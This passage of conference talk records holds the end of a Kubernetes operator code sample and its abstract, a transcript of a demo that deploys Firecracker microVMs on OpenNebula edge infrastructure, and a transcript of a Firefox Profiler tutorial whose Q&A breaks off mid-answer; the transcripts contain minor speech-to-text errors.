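		return ctrl.Result{}, err
	}

	// Finally, execute the "domain logic": print the message.
	fmt.Println(echo.Spec.Message)

	return ctrl.Result{}, nil
}

// SetupWithManager registers the controller; the predicate limits events to
// generation changes (i.e. spec updates), so the operator's own status updates
// do not re-trigger the loop, which is the fix shown in the demo.
func (r *EchoReconciler) SetupWithManager(mgr ctrl.Manager) error {
	return ctrl.NewControllerManagedBy(mgr).
		For(&echov1alpha1.Echo{}).
		WithEventFilter(predicate.GenerationChangedPredicate{}).
		Complete(r)
}
```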
Operator SDK is a solid foundation for building robust applications for Kubernetes; one such application is the VM import operator, allowing Kubernetes administrators to easily import their oVirt-managed virtual machines to KubeVirt. In this talk, the speaker will show how his team used Operator SDK to build the VM import operator and how that operator can be used. Kubernetes is on the rise and, thanks to its capabilities, many developers and administrators want to migrate their workloads there, which is not always possible right away or easy to do. The VM import operator can help in decomposing applications previously running in oVirt. If the current deployment doesn't allow for that, Operator SDK can ease the burden of either migrating existing applications to a new stack or building tools that allow existing software to run in a completely new environment. The attendees will: - learn basic principles guiding development with Operator SDK; - learn how the VM import operator works; - know how to import their oVirt workloads to Kubernetes, hassle-free.
10.5446/52822 (DOI)
Okay, hello everyone, I'm Cristian Gonzales. I'm here today to talk to you about serverless computing with OpenNebula and, more specifically, about running Firecracker microVMs at the edge. First of all, I'd like to thank the event organization for letting me be here today with you and also for the great work they've done given these difficult circumstances. So let me start by introducing a little bit about myself. I'm a cloud engineer at OpenNebula and I've been in charge of the development of the Firecracker and Docker Hub integrations, which are two of the main topics that we're going to cover here today. So let's start with what OpenNebula is, for those who are not really familiar with it. OpenNebula is a simple, feature-rich and flexible solution to build and manage enterprise clouds. It combines existing virtualization technologies like VMware and KVM virtual machines, LXC system containers or, the latest addition, Firecracker microVMs. It combines all these existing virtualization technologies with some advanced features like multi-tenancy, automatic provisioning or elasticity to offer on-demand virtualized services and applications. So this is the basics of what OpenNebula is. Let's see now how OpenNebula is being used. There are four main scenarios that OpenNebula covers. OpenNebula will allow you to manage your own on-premises infrastructure. It will also allow you to manage any hosted infrastructure. It also allows you to deploy virtualized loads in public cloud providers. And the last scenario is to allocate and manage edge infrastructure. This last case is the one we call the true hybrid cloud architecture. You can find more information in the link at the bottom of the slide. We like to say that this is the true hybrid cloud because you will use bare-metal cloud providers for allocating infrastructure, a bare-metal infrastructure, and then you will deploy on it all the different types of virtualized loads that we support. We will go into that deeper in a moment. This is the main case that we are going to cover today. So first of all, we are here today to speak about two different topics, edge computing and serverless computing. First I'm going to give you an overview of how we think of these topics in OpenNebula, and after that we will make a demo to show how the two of them work together. So I'd like to introduce our goals in each of these topics. Regarding edge computing, our main goal is to provide some tools to our users to allow them to easily and quickly deploy edge infrastructure by using bare-metal cloud providers. Then, once we have this infrastructure, we want you to run serverless loads on it. We want to provide a fast and secure way of deploying these serverless loads, and in order to do so, we think that the best strategy is to use Firecracker microVMs along with Docker images. We'll cover this also during today's talk. So let's focus first on the edge. Let me introduce you to the ONEedge.io project. This is the project that wraps all the development that we've been doing in OpenNebula related to edge computing. It has received funding from the Horizon 2020 Research and Innovation Programme of the European Union, which has helped out a lot with this development. Now that we know what the ONEedge project is, let me provide an overview of the three main points that we took into account when we were designing these edge tools for allowing our users to easily and quickly allocate and manage their edge infrastructure. There are three main points.
The first of them is this innovative cloud disaggregation. Currently, with globalization, companies' requirements are changing. Previously, a company would have one big data center, centralized in its main headquarters, providing all the services that the company offers. But lately, with globalization, most companies aim to provide services worldwide, and this architecture is a bit limited for today's requirements. So companies need to disaggregate their data center and have multiple data centers in multiple locations, probably smaller than the one big data center. We know that maintaining multiple data centers spread around the world is difficult or even impossible for many companies that cannot afford the cost of having and maintaining them. We also noticed the emergence of bare-metal cloud infrastructure providers, which allow us to allocate bare-metal infrastructure on demand, at more affordable prices for this kind of company. So we took advantage of this, and also of the current state of automation tools like Ansible or Terraform, which allow us to really easily and quickly allocate and configure infrastructure. We took these three main points and we developed our OneProvision tool, which takes advantage of all of them to allow our users to allocate and manage edge infrastructure in a very quick and very easy way, as we will see later in the demo. So now that we have the philosophy behind the edge computing part of OpenNebula clear, I'd like to introduce a little bit about Firecracker, which is more related to the serverless part. For those who are not familiar with it, Firecracker is a virtual machine monitor developed by the team at AWS. It is used, for example, in AWS Lambda and AWS Fargate. The aim of Firecracker is to provide a virtualization technology that has a really low overhead and is really secure. Before Firecracker, when you wanted to deploy virtualized loads, you needed to choose between virtual machines, which are more secure but have more overhead, and containers, which are way more lightweight but may have some security problems compared with virtual machines. Firecracker came to break this trade-off and to provide a technology that has the best of the two of them. It provides very lightweight VMs, which they call microVMs, with a very low overhead, which allows us to increase the density on our hypervisor nodes. It is also a very secure way of deploying virtualized loads, because it keeps the virtualization layer, which in itself increases security, along with other measures they have taken to make the VMs as secure as they can. So Firecracker works at the same layer as QEMU; it just focuses on being very lightweight, which has some price, but it's a price that we are willing to pay. On top of Firecracker, we have developed the drivers for integrating it fully into the OpenNebula environment. We have developed all the monitoring drivers to make sure that microVMs are monitored, both for health and for metrics like resource usage; all the monitoring information that is available for a normal VM in OpenNebula is also available for microVMs.
We have also developed a way of accessing the microVMs through the VNC protocol, which is very useful when you need quick access to the microVM, for debugging for example. Also, drivers for networking and storage are available for Firecracker, which allows you to use, for example, Firecracker microVMs with VXLAN or VLAN, whichever networking driver you were using previously. So once we had this Firecracker integration ready, the next thing for us was to find a way of allowing our users to retrieve an image that they could use with Firecracker. I didn't mention it earlier, but Firecracker needs two main things: a root filesystem image, which in this case is the Docker Hub image, and an uncompressed kernel image. We have built some kernel images and uploaded them to our marketplace, but you can also build your own kernel image with the version and the flags that you need and just use that image depending on your requirements. So we settled on Docker Hub because there is a wide range of images already there, and it is well known by most people. We thought that was the solution that best fits all the requirements: it allows us to instantly have a wide catalog of technologies that can be easily deployed as Firecracker microVMs, giving users the flexibility they need for deploying their serverless workloads. So now that we have an overview of the way we think of the edge and serverless topics, I'd like to show you how this looks in the real world and how the things I've been talking about fit together. I have prepared a demo for you. For this demo, I have only prepared an OpenNebula node, an OpenNebula installation in a node. In this case, I'm using an AWS virtual machine, but that is anecdotal: we just need somewhere to run OpenNebula, which is going to be this VM. In this VM, I have just installed the OpenNebula packages and the OneProvision packages, which is the package that OpenNebula provides for installing the OneProvision tool, the tool that we are going to use for provisioning the resources, which is the first half of today's tutorial. We are going to provision some edge resources, and later, once we have these resources ready, we are going to deploy serverless loads on them. So here you have the graphic showing the result that we are going to have: we are going to have an edge node in Amsterdam by using the Equinix Metal provider, previously known as Packet, and we are going to deploy some application on top of it. So you can see how, with a couple of commands, we are able to both allocate the infrastructure and start running serverless loads. So the first part of the tutorial, as I said, is provisioning the edge resources. It has three main steps. First of all, we need to define a YAML file with all the details of the provision, like the physical resources that we want to allocate, in this case our host in Amsterdam. We can also define some virtual resources related to OpenNebula that we want to allocate for this provision, so they are all going to be related, and it will make it really easy to start deploying serverless loads once we have finished allocating these resources. Once we have this YAML file ready, we are going to want to validate it to make sure that the syntax in the file is correct. And after that, we are going to be ready for deploying the resources.
So let me share this with you, this YAML file here on the right side of the screen; you can see the YAML file I have prepared. First of all, we define here a name for the provision. The provision is going to be the whole set of resources that we are going to define in this YAML; in this case, I call it fosdem. The next step is to define the playbook we are going to use. For this provision we want to provision a Firecracker node, so I'm going to use the Firecracker playbook. Just letting you know that we use Ansible for configuring the hosts once we have allocated them in the bare-metal provider. These playbooks are provided by OpenNebula, so you just need to read the documentation to know which specific role you want to use depending on your necessities, or you can even customize them or add some dependencies if you need to configure something else. Below this, we define some information related to the provider we are going to use. In this case, we are going to use the packet driver. Here you need to provide some information for accessing Packet and the project you want to use, some information also on the kind of instances that we are going to instantiate, and where we want to instantiate them. After that, we just need to start defining the resources that we want to allocate. So here we are specifying that we want to allocate one host. This host is going to be used by the packet drivers, and we are going to call it like that; this name is for the bare-metal provider, so if we log into the bare-metal provider we can identify the different hosts that we have allocated and see that we have a host ready to be used. We want to create some datastores, so we can use these datastores within that host. We have defined here one datastore of each type that OpenNebula supports: one for images, one for system, which is where the VMs are going to be running, and one for files, which is where we are going to store, for example, the kernel files. After that, we are going to want to access the services in the VM, so we are going to create two networks, one private for inter-VM communication on the host and one public for allowing our users to access the VMs externally. And lastly, we are going to download two images: a kernel image from our marketplace, which will be used by Firecracker within the microVM, and, in this case, the nginx image from Docker Hub. So at the end of the tutorial we are going to have an nginx microVM running, with nginx ready to be used. Now we can take all this information, all these resources that we have allocated above, and we can define a virtual machine template, which is the template that we are going to instantiate in order to start deploying instances of this nginx image. So we call the template fosdem-nginx. Here we define some capacity values. In the context section, we define some configuration that we want to perform in the VM when it boots: we want to configure the networking, we also want to add the user's SSH key, and here we have a small script for starting the nginx service. Here also we are adding the disk that we want to use, in this case the image with ID 1, which is this one here: we want to use this nginx image in our virtual machine template. Also we are going to add a couple of network interfaces, one for the private network and one for the public one.
We also want to configure VNC for our virtual machine, or micro-VM, and here we configure all the kernel information that we need to boot the micro-VM. So once the YAML is ready, we need to validate it. Let me go to the server. Here on the server I have the exact same YAML, but with the real credentials defined instead of these asterisks, and we validate it by running the oneprovision validate command over the YAML file. We can see that it doesn't report any errors, which means our file syntax is correct, so we can proceed to provision the infrastructure. In order to do so, we run the oneprovision create command, we pass the same YAML file, and we pass a flag here for some debug information, so we can make sure that everything is working as expected. We just hit enter and the OneProvision tool starts allocating all the resources we have defined in the YAML. This can take a while, so let's wait a little bit. Now we can see that the execution has finished, so let's look at the log to check the different things it has been doing. Let me go up. Here it started — just to give you the timing, it started at 18:27 and finished at 18:34, so it took about seven minutes to allocate all the resources, including the infrastructure in the bare-metal provider. Here it is creating some resources like the datastores, that kind of thing. After that it creates the host: it allocates the host in the bare-metal provider, and once the host is ready it starts running the Ansible scripts to configure it — we can see some debug information here. Once that is done it creates the rest of the resources, like images, virtual networks and templates, so all the resources that we defined should be ready to be used in our environment. In order to check that, we can connect to Sunstone, which is our web interface, and make sure that all the resources are there. We come here to the storage tab and look for the datastores that we created previously — we can see the three of them here. We look for the nginx image — we can see it is here in the first datastore. Let's look for the kernel image — you can see it here as well. We can also come here to look for the VM template — you can see it is already available here too. Let's check the host: we can see the host is here and it is successfully monitored, so everything is working as expected. And lastly, let's check the virtual networks — we can see here the networks we have created. So now we have all the resources allocated and we can proceed with the next part of today's demo, which is deploying serverless workloads. These serverless workloads are Firecracker micro-VMs. Normally, first of all we would need to import an official image from Docker Hub — we have already done this in the YAML, but we could also do it manually instead of doing it in the YAML. Then we would need to customize the micro-VM template: the network interfaces, the image, all the things I mentioned earlier while discussing the YAML file. Both of these steps are already done by OneProvision because we defined these resources in the YAML file, so the only remaining step is to deploy our serverless workload.
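For reference, the two provisioning commands used above look roughly like this when typed out (the file name is a placeholder and the exact debug/verbose flag spelling may differ between OpenNebula versions):

```sh
# Check that the provision file is syntactically correct
oneprovision validate fosdem.yaml

# Allocate the bare-metal host and create all the OpenNebula resources
# defined in the file; the debug flag prints extra log output while it runs
oneprovision create fosdem.yaml --debug
```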
So in order to do that, we come here to the VM templates. We are going to instantiate this fosdem-nginx template and wait for it to be deployed. So we instantiate it — okay, it's taking a little bit. Now that it is instantiated we can go to the instances view, and we can see here that it is booting. Let's wait a few seconds for it to finish. Okay, now we can see that the micro-VM is up and running. If you think about it, the only thing we have done is run the oneprovision command, which already created all the resources defined in the YAML file; after that we just had to instantiate the template, and we already have our nginx server running. Let's check that it is working as expected. We take the public IP of the service and connect to it — if we connect to that IP address, we can see that the nginx server is up and running, so the deployment has been successful. We can also check the VNC if we want; you can see that we have console access here using the VNC protocol. So now we have everything running. The next step would be to remove the infrastructure — imagine that you have allocated some resources, you have already used them and you don't need them anymore. First of all we terminate the virtual machine here. Okay, now the virtual machine has been terminated, and the next step is to remove the provision that we created. In order to do so, we need the provision ID. We can get it with the oneprovision list command, which lists all the provisions — we have the provision we created here. So we are going to delete this provision to remove the resources that were created for it: we just run oneprovision delete, we pass the ID, and we use the cleanup flag. Now the resources are being deleted. Once everything is deleted, none of those resources should be available anymore — all the images and templates that we created before should be removed. Let's check it: we can see that there are no images there, there are also no templates here, and we can check the hosts as well — as you can see, all the resources have been removed. So with a couple of commands you can allocate all the infrastructure you need, and with one command you can tear everything down at once. And you have seen how easily you can start deploying virtualized serverless workloads on the infrastructure we just allocated, in around ten minutes. Now that we have seen how all this works together, I'd like to share with you some improvements that we are going to add in the upcoming OpenNebula 6.0 version, which is our next major release — we aim to have a beta version in February. The most important improvements we are targeting for this release are: improving the user experience for application deployment — we are working on a specialized user interface for deploying applications more easily; making it easier to incorporate new infrastructure providers, so we can grow our catalog of providers; providing a web interface for the provisioning tool, which, as you have seen, is currently only available on the command line; and some work to facilitate the deployment of lightweight Kubernetes clusters at the edge — we are working with the Rancher people and the MicroK8s people on these strategies.
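Going back to the teardown step of the demo, the command-line sequence looks roughly like this (the VM and provision IDs are placeholders, and the exact flag spelling may differ per version):

```sh
# Terminate the running micro-VM first (0 is a placeholder VM ID)
onevm terminate 0

# Find the ID of the provision created earlier
oneprovision list

# Delete the provision and clean up every resource created with it
oneprovision delete <provision_id> --cleanup
```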
So that will be out soon — I hope it's interesting for you. Now I'd like to cover some use cases, just to let you know about some proofs of concept that we've been doing with some of our clients, and some topics where we think this edge infrastructure combined with serverless fits really well. One of the more basic cases is low-latency gaming: when you provide an online game, you probably want to reduce the latency for your users as much as possible, because it improves the user experience — those of you who are gamers will be familiar with the feeling when the internet connection is not as good as it should be. Live broadcasting is another really interesting topic for edge computing; it can reduce loading times a lot. We have also been making some interesting proofs of concept with the Internet of Things and the telecom edge cloud — you can find more details here. This can also be applied to desktop virtualization environments, and, as I mentioned, we are working on Kubernetes deployment on top of OpenNebula, which could add a lot of flexibility. And that's all for today. Here you have some information: if you are interested in giving it a try, or you want to reproduce the demo I performed today, you can use the miniONE tool, which is a very simple tool that allows you, with a few quick steps, to install OpenNebula on your laptop, for example, and have it ready to start deploying any virtualized workload that you need — for example LXD, KVM, or Firecracker. We also suggest trying the current release, which is Firework; maybe by the time this talk comes out, the release candidate for the next version will already be available, so you could give that a try as well. Here is some contact information, in case someone is interested in contacting us — feel free to reach out about anything that you might find interesting. And now let's start with the Q&A. Thank you very much. Thank you
OpenNebula has recently incorporated a new supported hypervisor: Firecracker. This next generation virtualization technology was launched by AWS in late 2018 and is designed for secure multi-tenant container-based services. This integration provides an innovative solution to the classic dilemma between using containers—lighter but with weaker security—or Virtual Machines—with strong security but high overhead. Firecracker is an open source technology that makes use of KVM to launch lightweight Virtual Machines—called micro-VMs—for enhanced security, workload isolation, and resource efficiency. It is widely used by AWS as part of their Fargate and Lambda services. Firecracker opens up a whole new world of possibilities as the foundation for serverless offerings that need to deploy containerized critical applications nearly instantly while keeping them in isolation. OpenNebula is a simple, yet robust, open source platform for building Enterprise Clouds and managing Data Center virtualization. Its integration with public cloud providers offers additional flexibility in creating True Hybrid and Edge infrastructures. By incorporating Firecracker, OpenNebula now provides users with a powerful solution for serverless computing and an alternative, native model for secure container orchestration. In this talk we will explain the technical details of this integration and will show a live demo on how to easily deploy and orchestrate a composition of Docker Hub images running as Firecracker microVMs on a distributed bare-metal Edge infrastructure.
10.5446/52827 (DOI)
Hi everyone, thanks for coming to my talk. Today I will be talking about using the Firefox Profiler for Web Performance Analysis. I am Nazim Janalsnova, I am currently living in Berlin and I am originally from Turkey and I am a software engineer at Mozilla. I am working in the performance tooling team which is responsible of Firefox Profiler and these are my Twitter and GitHub handles if you are curious. So today I am going to be talking about briefly what a Profiler is and then I am going to switch to what Firefox Profiler is and its advantages are and talk about how to capture a Profile and then after I am going to talk about how to capture a good Profile and after this I am going to be showing you the Profiler Analysis UI and then I am going to show you the Profiler sharing feature and lastly I am going to do a demo session where I am going to open up a Profile and show you the UI in a more interactive way and then I will analyze two performance issues. So these performance issues are actually from Firefox Profiler itself so we are going to be profiling the Profiler and the first performance issue is about it is written over a big loop and the second one is about a reflow issue. So if you are curious about the Firefox Profiler already you can check out Profile.Firefox.com but we are going to get into the details pretty soon anyway. So this is a quick preview about what you are going to see when you open up an analysis UI in the Firefox Profiler but so it is kind of crowded if you are looking at it at the first time but don't worry if it is looking intimidating so we are going to get into the details of the UI pretty soon and you are going to understand all the components. But first we need to know what a Profiler is. In a very broad explanation Profiler is a tool that helps developers to analyze performance issues and it gives insight. So I know that this is a very broad explanation but this is because there are lots of different types of Profilers that are event based Profilers, statistical Profilers, instrumentations and heap Profilers for memory Profilers. So they all do different things under the hood but essentially the goal is the same. They give insight about your program and about the execution of your program. So it will really take a lot of time to explain all those types but at least I can explain to you what is the Firefox Profiler. So it is a built-in Profiler that comes with Firefox so you can profile your web apps, your web extensions or even Firefox itself with it. Firefox Profiler is a statistical Profiler in its core but there are also other types of data sources like markers and screenshots and so it is a lot richer than just a statistical Profiler. So when you record a Profile, statistical Profilers works like this. So when you start recording it stops the execution of the program every one millisecond and gets all the information that it needs. There can be the call stack or CPU usage or any other type of information that it needs and then resumes the program. So it continues to do that every one millisecond or every end millisecond and then after that when you capture that Profile it aggregates all this data and uses statistical approximation to visualize it for you. So a little bit of history. So this is the old performance tab in the developer tools panel. So that tab for both recording and the analysis. And in the new one in the Firefox Profiler we have two different UIs now. The recording UI and the analysis UI. 
This is because recording UI should be very minimal and the analysis UI also should be more powerful by utilizing all the space. So that's why we have two different UIs now. So this is the motto of Firefox Profiler. Capture a Profile, analyze it, share it and make the web faster. And let's see what the main advantages of the Firefox Profiler are. So it has more information with markers, screenshots, network requests and different type of visualizations and more. Also this is one of the things that were actually written in the motto. So you can capture a Profile and then share it with an expert. So this is pretty important because previously it wasn't as easy to share a Profile data with someone else. So but now in this case you can either be the expert or somebody else can be the expert. And let's say that you are the expert and you cannot reproduce the issue. You can tell your colleague who can reproduce the issue to just capture a Profile for you and send it to you. Then with that Profile you will be able to see what is that program doing at that moment and you can understand the issue better. So or somebody else can be the expert and that way you can just capture a Profile and send it to them and they will be able to understand the issue better with that recording. And let's see how to capture a Profile then. Actually there are multiple ways to enable the Firefox Profiler but I think this is the easiest one. So you can go to Profile.Firefox.com as I told you and then follow the instructions. That's pretty much it because there is a big button that says enable the Profiler menu button. When you click on that a menu button will appear on the top right corner of your Firefox and then when you click on that little arrow you will see this pop up. So this is the recording UI as I've shown you before. There are not a lot of things to show here. There are settings which is web developers by default and this is the most lightweight version. So I would recommend to use that and if you want to learn more you can click on that link and that will redirect you to the documentation but also you can find the documentation link at the end of these slides. And there is just start recording and capture recording button. But also it's good to note that you can directly start and capture a Profile with the shortcuts. This is pretty important because sometimes you wouldn't want to open the pop up all the time because opening a pop up also creates an overhead for the Firefox and you wouldn't want the recording of this pop up visualization in your profile. So you can just use the shortcuts which is Ctrl shoot 1 and Ctrl shoot 2. So now we've looked at how to capture Profile. Now let's see how to capture a good Profile. So because take away is to isolate the problem as much as possible. We don't want to see unrelated information in the Profile because that can distract us very easily. So it's not a must but it's a good practice to remove the unrelated tabs and make sure that nothing else can interfere with the program that you are profiling and skewed the data. So the second thing is to make sure you reproduce the result you want because sometimes you might be looking at an intermittent issue and it may be tricky to reproduce. So you need to check the result in your web application to make sure that the result is the thing that you want. 
And also check in the Profile analysis UI that you captured it successfully and you're happy with the result because sometimes you can start the Profile in too late or you can end it too early so you may miss the important piece. So don't hesitate to take multiple Profiles and don't be afraid of like just discarding the old ones if you're not happy with them. And now we've seen how to capture Profile. The next step is the Profiler analysis. So let's see the Analysis UI. So as I've shown you before this is the Analysis UI and at the top you are going to see the timeline. And this is an overview of the Firefox's execution of your tab that you're profiling. It's a great way to see what's going on because the X axis is the time and the other categories or other colors are the functions that are being called. So you can understand in which time what type of function is being called. And it's also a great place to navigate in your Profile. So for the navigation we have this range selection. You can drag and drop a range and zoom in that view by clicking on that magnifier button. So when you click on that this will use the 100% of the width and all the information in the Analysis UI will be updated for the view that you're seeing only. And also in this timeline we have the Screenshots. So that's a great visual indicator to see what's happening in the web page when you are recording this Profile. And for example when you are calling a function or when you're clicking somewhere. So when you hover over a screenshot also in the timeline you will see this bigger version of the screenshot so you can see more details. Also below the Screenshots we have the category Graph. So this is the Graph of the functions that are being called but they are aggregated by the category. And all the colors in that Graph represents a different category. So for example in this Graph yellow means JavaScript, blue means DOM and orange means GC. So if you see a lot of oranges intermittently all the time that means that we're doing a lot of GC and then you can try to understand why we are doing this and you can try to reduce that GC time because that can create an overhead overall. And under the category view we have the Markers. So Markers are important events that are happening inside the Firefox's code execution. So they are more precise and they also include additional information. So that's why they are pretty important and you can see a lot of things, a lot of insights. As you can see in these they are just black boxes but when you hover over those you are going to see a lot of information. Also I'm going to show you in the next slide. Also the good thing to note that like you can actually create your own markers by using the performance mark and performance measure APIs from JavaScript directly. So when you hover over those little squares you are going to see this Marker tooltip. So this tooltip gives you a lot more information about those squares. For example at first it gives you the time spent for that marker and then the name and additional information. In this case this is the styles marker and it gives you even the all styles related numbers. And in this area we have the resources panel. So this was actually collapsed at first so it wasn't visible but you can click and expand it. And when you expand it you are going to see the iframe that belongs to that web page. 
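Going back to the custom markers mentioned a moment ago: they use the standard User Timing API, so emitting your own from application code takes only a few lines. A minimal example (the function being measured is a hypothetical stand-in for your own work):

```js
// Mark the start and end of an interesting operation in your own code...
performance.mark('search-start');
runSearch(); // hypothetical application function standing in for your own work
performance.mark('search-end');

// ...then create a named measure between the two marks. Both the marks and
// the measure show up as markers in the captured profile.
performance.measure('search', 'search-start', 'search-end');
```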
So in this case this was the cnn.com and as you can see there are 10 iframes and all of them are either tracking iframes or iframes that are related to ads. And actually if you look at that like most of them are pretty empty and that's because Firefox does a pretty good job on tracking the I mean removing the tracking iframes and that is thanks to the enhanced tracking protection. But if you look at the last iframe there are some activity going on. So this was because this is the ads loading in that time. So we've seen the timeline now and the timeline was the overview overall. And at the bottom side we have the panels and these panels are a lot more comprehensive and a lot more detailed. So when you are done with the timeline and when you are having an over evane when you understand where you should look then you switch back to the panels and understand or try to understand what is happening in a more detailed way. So there are lots of tabs in this panel so I'm not gonna explain everything right now because it's a lot better to do it in the demo section so I'm gonna defer that to that time. So we've talked about sharing a profile before now let's see how we can actually share it. So on the top right corner you're gonna see an upload button. When you click on that you're gonna see this panel. So there are some checkbox in it. So these checkboxes are for including or excluding some information that may or may not be personally identifiable. So for example there are screenshots, there are URLs or extension information. So these type of things can be personally identifiable and you may not be comfortable sharing those. So before uploading the profile you can uncheck those and that way you may you will not share the things that you're uncomfortable with. And lastly when you click on that upload button you're gonna see that permalink and you can use that permalink to either send it to your colleague or you can just save it somewhere and then you can take a look at that profile later on. So now we've actually seen a lot of things and this was all the things that I wanted to show in the slides. Now I want to switch back to the demo section and tell you more about the UI and then analyze the performance issues. So this is an example profile and this is actually the same profile that I've shown you in the slides. So you're gonna see something like that. So when you hover over the screenshots you're gonna see the bigger versions and when you hover over those category graph and you're gonna see all the categories for example this is JavaScript, there's GC there happening, there are layout happening, another GC etc. And there are markers as you can see. So these markers are to show you what kind of events are being happening at that moment. For example there are some DOM events happening and there is big ready state change event happened etc. So and these are the panels that we've seen before but let me introduce you more about them. So there's Coltree, FlameGraph, StackChart, MarkerChart, MarkerTable and Network. So let's start with Network because this is the easiest one I guess. And I'm sure you're pretty familiar with the network panels and network requests so this is pretty similar to that. You see for example edition.sienand.com and you see how long it took and you see the breakdown of this network event too. So it took 204 milliseconds to load. So you can see other things as well. And in the MarkerTable and MarkerChart you see the more details of these markers. 
So the MarkerChart is pretty visual and pretty similar to the markers in the timeline actually. So you see but we separate them in a more categorized way because you see the DOM category here, you see the graphics, JavaScript, layout, network etc. So you can see what is happening and since there are also some information in here like you can understand what type of events that are being happening at that moment. And when you double click on that you will directly zoom into that wheel and it can go in if you want. Or you can also try to go in like this and then you can go out by using this. So and the MarkerTable is the table version of MarkerChart. So you can also right click on those copy, copy, marker, JSON. You can do the same things with this too. And for the Caltree, FlameGraph and StackChart we use that the samples that were collected here thanks to the statistical profile that I've mentioned before. So here we aggregate all the samples and show you for example in the roots of course everything took 100% of the total samples. But when you go down and go inside you're gonna see the breakdown. For example this JS run script took 9.7%. And of course you can just click on this JavaScript only and only focus on your JavaScript instead of some Firefox internals. So you can also option click on those or alt click and that will automatically expand everything. So since this is the cnn.com they're all minified functions but for your web page you will see the better function names. And also you can invert the call stack. When you invert it you will see the functions that took most of the time. So this is 3% of total samples and this is the longest running function in that profile. So also inverting the call stack actually gives you pretty interesting information too. And in the frame graph of course you need to you cannot invert it but in the flame graph you also see the visualized version of the Caltree. So it's the same data but with a different visualization. So you can still see what type of events are being happening at that time and then you can see what is being called. For example event handler none null calls this and this and then eventually offset hide is being called. And stack chart is also pretty similar but it's also like the opposite way. So flame graph is bottom to top and stack chart is top to bottom but also the difference is that the x axis of the stack chart is actually time. So it's pretty similar to what you see in this graph. For the flame graph x axis doesn't mean anything actually. So yeah we've seen the profiler so this is the permalink you can get, this is the reupload button if you can upload and this is the information about this profile. So let's go back to another profile and then this is a bug actually that I want to solve with you. So there is a performance issue with this so let me show you. When we resize this page it takes a lot of time to finish the resizing. As you see it just finished. So it shouldn't be like this right? When you make it bigger again it also takes a lot of time to resize back. So we need to figure out why this is taking so long. That's why I'm going to start the profile. So I've got the profile from profile.firefox.com now it's here so I'm going to start the profiler with control shift 1 and then resize it. And I'm going to wait until it's done but I'm also ready to just capture the profile now. So it's not quite done yet and when it's done now I'm going to capture it. So now I captured it. 
As you can see there are lots of reflows happening so you can clearly see that there is a reflow issue here because there are hundreds of reflows, reflow markers and you can look at the marker chart here there are lots of reflows. Also you can focus on this area because when you see a red marker that means firefox wasn't responsive at that time. So you see a huge red marker there and that means bad things are happening here. So if you look at that jank marker I mean this reflow markers there are hundreds of them. And let's look at the flame graph. Let's see what we can see, what we can figure out. And so this is the reflow we already seen so we should look at the reflow. So you can either go back to only JavaScript but also it's good to see the reflow because we want to know what is actually triggering the reflow right. So the thing that is being triggered is get bounding client-rekt and it's being called by update with. So actually you can see the same data called tree 2. You can just invert it and you're going to see that there is a reflow happening all the time. When you go in you are going to see the bounding client-rekt and that is being called by update with. So I'm going to just right click and copy the function name and I'm going to go to my code base and then search this. So this is the function that is being called all the time. So and this is the get bounding client-rekt that is responsible of the reflow. So this is, this should be improved or like we should either reduce the call of this because whenever we call the get bounding client-rekt it always triggers a reflow. So we should avoid using this function as much as possible. But since we have lots of tracks here it's calling like 800 times or something. So that's why that's the problem here. So actually this, I cannot solve this right away in this demo section because this needs a bigger architectural change in the code base. But at least in a very easy profiling session we can just understand what's the comp with and what's the reason that is taking so long, right? So it's pretty easy. And I'm going to look at the second issue now. So you've seen the reflow issue and this is about the marker chart. So whenever we try to like hover over those, as you can see it's taking some time to open the tooltip. So it's not very responsive right now. We need to figure out why this is happening. So I'm going to again start capturing with control shift 1. Then actually let me start again and then I'm going to just do back and forth and when I'm done I'm going to capture it with control shift 2. So as you can see there are again some red markers. I want to focus on this area specifically because I think we can see more clearly here. And I can look at that and let's invert the cold stack and we see that draw markers is taking a lot of time. So we can clearly see that draw marker is the copper. So let me look at the flame graph and in here again draw markers is taking a lot of time and also to the canvas context that fill is also taking a lot of time as well and this is being called by draw1marker. So I'm going to also copy this function name and search it. So this is that function and here there's the context.fill. So this is being called all the time and it's taking quite a lot of time but since this is a JavaScript API we cannot make it more performant. So the thing that we should do is to either work around with either like removing the cold if it's possible or reduce the amount of colds. 
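Circling back to the first issue for a moment: the general pattern behind that kind of fix is to avoid calling a layout read like getBoundingClientRect once per item, and to batch reads before any writes so a single reflow serves everyone. A simplified, hypothetical sketch of the idea — `tracks`, `container` and `setWidth` are made-up names, not the actual Firefox Profiler code:

```js
// Before: each track measures itself, and every getBoundingClientRect call
// made after a layout-invalidating change forces a synchronous reflow.
tracks.forEach((track) => {
  const width = track.element.getBoundingClientRect().width; // reflow per track
  track.setWidth(width);
});

// After: do the layout read once (or batch all reads before any writes),
// then reuse the cached value for every track.
const sharedWidth = container.getBoundingClientRect().width; // single reflow
tracks.forEach((track) => track.setWidth(sharedWidth));
```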
So let's see where we are calling this draw1marker. So draw1marker is being called from the draw markers I think. So we should avoid calling this as much as possible and there's an if check to avoid this. So it says always render non-dot markers but also do not render dot markers that occupy the same pixels as this can take a lot of time and so this is actually the thing that we want. So actually we've previously somebody else did a performance improvement on this but I think this performance improvement is not working quite well. So when I look at this Boolean expression it's not correct. So I know this because I know the code base it might not be very clear to you but actually it should be something like this. We should not compare it with zero but we should instead compare it with dot width. So when we do that actually this will be the correct expression here otherwise when we do this zero it will always be true. So that's it. I might have to cut out some of the parts from the demo session to fit that into my first time schedule but I'm hoping that it's not going to be too much. So thank you all for coming to my talk and I hope that was helpful for you. And you can find the Firefox Profiler documentation and slides in these links. Also you can join us in the Firefox Profiler Metrics channel to ask us any questions. Thank you. Okay I think we are live now. And we are live. Yes I am joined here by Nazim from Mozilla. We're in the Q&A session after the talk. Hello Nazim. Hello. Thank you. Let's get into the questions. So the first one here is from Patrick. Is there a way to start, stop or export the Profiler from WebDriver or from another automation extension after collecting them? So currently I think we don't support WebDriver yet but we have some internal tools called Raptor. So I guess you can use that also in your project too because it's open source or there's browser time tool that supports Firefox Profiler. So you can capture a profile with browser time and then you can add dash dash Gekko Profiler I think and then it will automatically capture the profile itself too and then you can just drag and drop that JSON file into the profile that Firefox.com and it will show you the profile. I hope that answers the question. Let's see if there are a follow up there. Yes the next one is from Peter. Do you know how much overhead the profile adds when you're doing the recording? So yeah it's pretty significant if you don't like if you don't want to profile it and like I wouldn't recommend it to like open all the time. So the Web Developer preset is actually using a lot less resource compared to other ones. So I would recommend you to use that also like if you select custom preset we have like a like a big list of like settings and in that settings you can select like do not sample. So if you disable sampling it will only capture the markers and if you're okay with that like if you're okay with just markers and if you think that it's going to be enough for you you can reduce the overhead significantly and it also like overhead generally depends on like how many tabs you have, how 